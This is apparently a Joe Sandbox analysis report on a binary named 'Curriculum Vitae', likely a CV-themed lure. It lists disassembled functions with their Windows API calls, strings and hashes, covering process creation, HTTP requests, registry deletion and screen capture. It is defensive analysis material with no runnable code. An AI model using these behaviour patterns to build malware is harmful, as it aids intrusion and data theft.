                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen
                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                      • API String ID: 176396367-1603158881
                      • Opcode ID: 7d9edbf8a742fc3ebf34719f16cd19bab15adcbf6565f70561434467120d0e87
                      • Instruction ID: b6b80173fe87ee00fab2fe2e74876829a95c606689bf0352fc40ca6373910da8
                      • Opcode Fuzzy Hash: 7d9edbf8a742fc3ebf34719f16cd19bab15adcbf6565f70561434467120d0e87
                      • Instruction Fuzzy Hash: 3CE19531A00616ABCF189FA8C4517FEBBB4FF54710F598119E956B7250DB30AE898BB0
                      Function 00DA44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                      Download Yara Rule
                      APIs
                      • CharLowerBuffW.USER32(00000000,00000000,00DCCC08), ref: 00DA4527
                      • _wcslen.LIBCMT ref: 00DA453B
                      • _wcslen.LIBCMT ref: 00DA4599
                      • _wcslen.LIBCMT ref: 00DA45F4
                      • _wcslen.LIBCMT ref: 00DA463F
                      • _wcslen.LIBCMT ref: 00DA46A7
                        • Part of subcall function 00D4F9F2: _wcslen.LIBCMT ref: 00D4F9FD
                      • GetDriveTypeW.KERNEL32(?,00DF6BF0,00000061), ref: 00DA4743
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$BuffCharDriveLowerType
                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                      • API String ID: 2055661098-1000479233
                      • Opcode ID: e7ea8b155e50802b1a6799a61a4a17cf072d6c9aa89cd8daa17b4f8615a3a9f4
                      • Instruction ID: a8e5c984be640d596aaa2c44a6ec93e4e2c0a7511fd8066a0866e2e86811a4d6
                      • Opcode Fuzzy Hash: e7ea8b155e50802b1a6799a61a4a17cf072d6c9aa89cd8daa17b4f8615a3a9f4
                      • Instruction Fuzzy Hash: 1FB1EF716083029FC710DF28C891A6AB7E5EFE6720F58891DF596C7291E7B0D844CBB2
                      Function 00DC911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • DragQueryPoint.SHELL32(?,?), ref: 00DC9147
                        • Part of subcall function 00DC7674: ClientToScreen.USER32(?,?), ref: 00DC769A
                        • Part of subcall function 00DC7674: GetWindowRect.USER32(?,?), ref: 00DC7710
                        • Part of subcall function 00DC7674: PtInRect.USER32(?,?,00DC8B89), ref: 00DC7720
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00DC91B0
                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DC91BB
                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DC91DE
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DC9225
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00DC923E
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00DC9255
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00DC9277
                      • DragFinish.SHELL32(?), ref: 00DC927E
                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DC9371
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#
                      • API String ID: 221274066-136824727
                      • Opcode ID: 4b28c70fe18a113105f6dada79db946151e2f748950d57d97207f1db9bd34260
                      • Instruction ID: 023d1941b9ecc52bcd7b74c0c2455a229cb9e252cbda4916bcb22837a5025b5c
                      • Opcode Fuzzy Hash: 4b28c70fe18a113105f6dada79db946151e2f748950d57d97207f1db9bd34260
                      • Instruction Fuzzy Hash: 03615A71108302AFC701DF54DC99EABBBE8EF88750F40491DF695932A0DB709A49CB72
                      Function 00DBAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 00DBB198
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBB1B0
                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DBB1D4
                      • _wcslen.LIBCMT ref: 00DBB200
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBB214
                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DBB236
                      • _wcslen.LIBCMT ref: 00DBB332
                        • Part of subcall function 00DA05A7: GetStdHandle.KERNEL32(000000F6), ref: 00DA05C6
                      • _wcslen.LIBCMT ref: 00DBB34B
                      • _wcslen.LIBCMT ref: 00DBB366
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DBB3B6
                      • GetLastError.KERNEL32(00000000), ref: 00DBB407
                      • CloseHandle.KERNEL32(?), ref: 00DBB439
                      • CloseHandle.KERNEL32(00000000), ref: 00DBB44A
                      • CloseHandle.KERNEL32(00000000), ref: 00DBB45C
                      • CloseHandle.KERNEL32(00000000), ref: 00DBB46E
                      • CloseHandle.KERNEL32(?), ref: 00DBB4E3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                      • String ID:
                      • API String ID: 2178637699-0
                      • Opcode ID: 239d19dadccd798969579bfa8be6972f1dbd3c042336738775f94fbff91aa2cb
                      • Instruction ID: b0508a9f1c3e10976322ce03ef94e3d110ffeb2d641280efac2414ac77a26f96
                      • Opcode Fuzzy Hash: 239d19dadccd798969579bfa8be6972f1dbd3c042336738775f94fbff91aa2cb
                      • Instruction Fuzzy Hash: 91F14B71504240DFC714EF24C891B6ABBE5EF85324F18855EF8969B2A2DB71DC44CB72
                      Function 00D3326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetMenuItemCount.USER32(00E01990), ref: 00D72F8D
                      • GetMenuItemCount.USER32(00E01990), ref: 00D7303D
                      • GetCursorPos.USER32(?), ref: 00D73081
                      • SetForegroundWindow.USER32(00000000), ref: 00D7308A
                      • TrackPopupMenuEx.USER32(00E01990,00000000,?,00000000,00000000,00000000), ref: 00D7309D
                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D730A9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                      • String ID: 0
                      • API String ID: 36266755-4108050209
                      • Opcode ID: 508505b5cf636df6408516843b7673e02caaeb6c3f2782eca0f132cbc62ad392
                      • Instruction ID: d17645cfd64049dc2aaa620c439dec9d57f9241235d701314771e9c553e3d3ad
                      • Opcode Fuzzy Hash: 508505b5cf636df6408516843b7673e02caaeb6c3f2782eca0f132cbc62ad392
                      • Instruction Fuzzy Hash: DB712930644246BFEB218F65CD49FAAFF64FF04364F248216F618AA1E0D7B1A910DB70
                      Function 00DC6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(?,?), ref: 00DC6DEB
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DC6E5F
                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DC6E81
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC6E94
                      • DestroyWindow.USER32(?), ref: 00DC6EB5
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D30000,00000000), ref: 00DC6EE4
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DC6EFD
                      • GetDesktopWindow.USER32 ref: 00DC6F16
                      • GetWindowRect.USER32(00000000), ref: 00DC6F1D
                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DC6F35
                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DC6F4D
                        • Part of subcall function 00D49944: GetWindowLongW.USER32(?,000000EB), ref: 00D49952
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                      • String ID: 0$tooltips_class32
                      • API String ID: 2429346358-3619404913
                      • Opcode ID: 450096d62d4ebdc229a21917daca854c9c09ffb84b3887d2c02835a1a8206498
                      • Instruction ID: d3cf1225a7d2b37b25621bdcd5eba6035e823cc54e0bd7529240a4eec8540f4c
                      • Opcode Fuzzy Hash: 450096d62d4ebdc229a21917daca854c9c09ffb84b3887d2c02835a1a8206498
                      • Instruction Fuzzy Hash: 58716770144346AFDB21CF18D844FAABBE9EF88304F58441EFA8997261D771E94ADB21
                      Function 00DAC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DAC4B0
                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DAC4C3
                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DAC4D7
                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00DAC4F0
                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00DAC533
                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00DAC549
                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DAC554
                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DAC584
                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00DAC5DC
                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00DAC5F0
                      • InternetCloseHandle.WININET(00000000), ref: 00DAC5FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                      • String ID:
                      • API String ID: 3800310941-3916222277
                      • Opcode ID: b42bc0a97f689310293f77ef1bcb7f5af0fa3a861cedc45c698438e062fc6828
                      • Instruction ID: a4332aa620c1b1a762f0e6f20c22cff1b02a327eac1972f57db4f4d5e034b1bd
                      • Opcode Fuzzy Hash: b42bc0a97f689310293f77ef1bcb7f5af0fa3a861cedc45c698438e062fc6828
                      • Instruction Fuzzy Hash: 66514BB151030ABFDB218F60C948AAA7BFCEF0A764F146419F949D6650EB34E9449B70
                      Function 00DC856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00DC8592
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85A2
                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85AD
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85BA
                      • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85C8
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85D7
                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85E0
                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85E7
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00DC85F8
                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00DCFC38,?), ref: 00DC8611
                      • GlobalFree.KERNEL32(00000000), ref: 00DC8621
                      • GetObjectW.GDI32(?,00000018,?), ref: 00DC8641
                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00DC8671
                      • DeleteObject.GDI32(?), ref: 00DC8699
                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DC86AF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                      • String ID:
                      • API String ID: 3840717409-0
                      • Opcode ID: dc2dea5873f7196f599db99e7a18f4c514588e40f53d62f1a6525e3a7edbd246
                      • Instruction ID: 4ccdb574b79a4a5aab46889e72fe7522ea438a8ac4015736a3ba97b94540661b
                      • Opcode Fuzzy Hash: dc2dea5873f7196f599db99e7a18f4c514588e40f53d62f1a6525e3a7edbd246
                      • Instruction Fuzzy Hash: 66413A75610306AFDB119FA5DC88EAABBB8FF89711F144058FA09E7260DB709D01DB30
                      Function 00DA14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                      Download Yara Rule
                      APIs
                      • VariantInit.OLEAUT32(00000000), ref: 00DA1502
                      • VariantCopy.OLEAUT32(?,?), ref: 00DA150B
                      • VariantClear.OLEAUT32(?), ref: 00DA1517
                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DA15FB
                      • VarR8FromDec.OLEAUT32(?,?), ref: 00DA1657
                      • VariantInit.OLEAUT32(?), ref: 00DA1708
                      • SysFreeString.OLEAUT32(?), ref: 00DA178C
                      • VariantClear.OLEAUT32(?), ref: 00DA17D8
                      • VariantClear.OLEAUT32(?), ref: 00DA17E7
                      • VariantInit.OLEAUT32(00000000), ref: 00DA1823
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                      • API String ID: 1234038744-3931177956
                      • Opcode ID: 8a4333d5e464099329ed574ef0d5a9cb16d7a79423e203272db08d66286367bd
                      • Instruction ID: 827480f3945124a55121f8eebefaa47c1157170f94538545f651d0139d5c1fd1
                      • Opcode Fuzzy Hash: 8a4333d5e464099329ed574ef0d5a9cb16d7a79423e203272db08d66286367bd
                      • Instruction Fuzzy Hash: 5CD11E35E00606EBDB00AFA5D894B79B7B5FF46700F18845AE486AB290DB34EC40DBB1
                      Function 00DBB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                        • Part of subcall function 00DBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DBB6AE,?,?), ref: 00DBC9B5
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBC9F1
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA68
                        • Part of subcall function 00DBC998: _wcslen.LIBCMT ref: 00DBCA9E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DBB6F4
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DBB772
                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00DBB80A
                      • RegCloseKey.ADVAPI32(?), ref: 00DBB87E
                      • RegCloseKey.ADVAPI32(?), ref: 00DBB89C
                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DBB8F2
                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DBB904
                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DBB922
                      • FreeLibrary.KERNEL32(00000000), ref: 00DBB983
                      • RegCloseKey.ADVAPI32(00000000), ref: 00DBB994
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                      • String ID: RegDeleteKeyExW$advapi32.dll
                      • API String ID: 146587525-4033151799
                      • Opcode ID: 497b3b34e9c308b2239f5a14035bf5d6a789fca4c49ccdd771dd099c24d21fe3
                      • Instruction ID: 7c1a150435c72a899b28ef73cd39e192e80f204bf3c07acab9eaa218a0157f73
                      • Opcode Fuzzy Hash: 497b3b34e9c308b2239f5a14035bf5d6a789fca4c49ccdd771dd099c24d21fe3
                      • Instruction Fuzzy Hash: DDC16B34208202EFD714DF14C494F6ABBE5FF84318F18845DE59A8B2A2CBB1ED45CBA1
                      Function 00DB255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetDC.USER32(00000000), ref: 00DB25D8
                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DB25E8
                      • CreateCompatibleDC.GDI32(?), ref: 00DB25F4
                      • SelectObject.GDI32(00000000,?), ref: 00DB2601
                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DB266D
                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DB26AC
                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DB26D0
                      • SelectObject.GDI32(?,?), ref: 00DB26D8
                      • DeleteObject.GDI32(?), ref: 00DB26E1
                      • DeleteDC.GDI32(?), ref: 00DB26E8
                      • ReleaseDC.USER32(00000000,?), ref: 00DB26F3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                      • String ID: (
                      • API String ID: 2598888154-3887548279
                      • Opcode ID: b604eb56dea6f623ae585724828d983bdc38ba7c79cc8371e435b464e91b9c3e
                      • Instruction ID: 34569cf90a0cd3ba6ac9316f27fbe346ed26ba7b45ee520a6af6163849ae34f3
                      • Opcode Fuzzy Hash: b604eb56dea6f623ae585724828d983bdc38ba7c79cc8371e435b464e91b9c3e
                      • Instruction Fuzzy Hash: 1161D276D0021AEFCF15CFA4D884EAEBBB5FF48310F248529E55AA7250D770A941CF60
                      Function 00D6DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 00D6DAA1
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D659
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D66B
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D67D
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D68F
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6A1
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6B3
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6C5
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6D7
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6E9
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D6FB
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D70D
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D71F
                        • Part of subcall function 00D6D63C: _free.LIBCMT ref: 00D6D731
                      • _free.LIBCMT ref: 00D6DA96
                        • Part of subcall function 00D629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000), ref: 00D629DE
                        • Part of subcall function 00D629C8: GetLastError.KERNEL32(00000000,?,00D6D7D1,00000000,00000000,00000000,00000000,?,00D6D7F8,00000000,00000007,00000000,?,00D6DBF5,00000000,00000000), ref: 00D629F0
                      • _free.LIBCMT ref: 00D6DAB8
                      • _free.LIBCMT ref: 00D6DACD
                      • _free.LIBCMT ref: 00D6DAD8
                      • _free.LIBCMT ref: 00D6DAFA
                      • _free.LIBCMT ref: 00D6DB0D
                      • _free.LIBCMT ref: 00D6DB1B
                      • _free.LIBCMT ref: 00D6DB26
                      • _free.LIBCMT ref: 00D6DB5E
                      • _free.LIBCMT ref: 00D6DB65
                      • _free.LIBCMT ref: 00D6DB82
                      • _free.LIBCMT ref: 00D6DB9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
